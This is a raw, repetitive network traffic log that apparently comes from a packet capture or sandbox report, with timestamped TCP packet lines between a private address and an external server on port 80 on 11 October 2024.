                                                                                                                                                              Oct 11, 2024 22:32:34.736223936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736249924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736251116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736262083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736274958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736284971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736284971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736308098 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736315966 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736327887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736327887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736351967 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736352921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736368895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736372948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736392021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736412048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736423016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736447096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736459970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736459970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736479998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736488104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736501932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736501932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736525059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736526966 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736531973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736538887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736560106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736562014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736577034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736577988 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736594915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736597061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736607075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736612082 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736629963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.736630917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736649990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.736655951 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737004995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737029076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737042904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737046003 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737067938 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737081051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737133026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737144947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737164974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737171888 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737174988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737190962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737196922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737209082 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737210989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737234116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737252951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737258911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737263918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737282038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737291098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737292051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737313986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737318993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737332106 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737344980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737359047 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737376928 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737380028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737390995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737409115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737418890 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737421036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737436056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737447023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737456083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737462044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737473011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737479925 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737490892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737495899 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737507105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737510920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737526894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.737535954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737544060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.737560987 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890117884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890156031 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890187025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890201092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890214920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890234947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890255928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890265942 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890275955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890288115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890302896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890321016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890324116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890340090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890341997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890360117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890386105 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890389919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890402079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890422106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890425920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890439034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890436888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890454054 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890464067 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890470028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890472889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890491962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890501976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890507936 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890512943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890531063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890535116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890544891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890552044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890563965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890568018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890578985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890585899 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890599966 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890604019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890618086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890619993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890631914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890638113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890654087 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890659094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890671015 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890674114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890690088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.890691996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890710115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.890724897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891168118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891205072 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891236067 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891247034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891272068 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891283035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891285896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891294003 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891314030 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891314030 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891325951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891331911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891345024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891346931 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891361952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891376019 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891463995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891484976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891495943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891498089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891510010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891521931 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891526937 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891535044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891551971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891556025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891566038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891572952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891587973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891588926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891603947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891604900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891618967 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891617060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891635895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891639948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891653061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891654968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891674042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891690016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891769886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891779900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891798019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891804934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891819954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891834974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891902924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891912937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891927958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891938925 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891942024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891957045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.891957045 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891978025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891992092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.891992092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892004013 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892019987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892024040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892036915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892040968 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892056942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892066002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892074108 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892096996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892107010 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892117977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892138958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892158985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892174959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892189026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892204046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892204046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892219067 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892220974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892240047 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892255068 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892574072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892585039 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892601967 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892611027 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892611980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892633915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892637968 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892642975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892664909 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892688990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892695904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892728090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892764091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892774105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892791033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.892796040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.892817020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893013954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893024921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893039942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893047094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893049002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893059015 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893074036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893081903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893093109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893093109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893111944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893111944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893129110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893130064 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893143892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893162012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893318892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893330097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893348932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893352032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893368959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893384933 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893399000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893409014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893425941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893429995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893435955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893440962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:34.893446922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893462896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:34.893487930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.043977976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044025898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044035912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044054985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044066906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044079065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044104099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044116974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044131994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044145107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044159889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044174910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044174910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044176102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044176102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044176102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044217110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044255972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044269085 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044290066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044306993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044387102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044404984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044420004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044421911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044440031 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044440031 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044454098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044457912 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044471979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044473886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044482946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044487953 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044490099 CEST4970780192.168.2.845.66.249.162
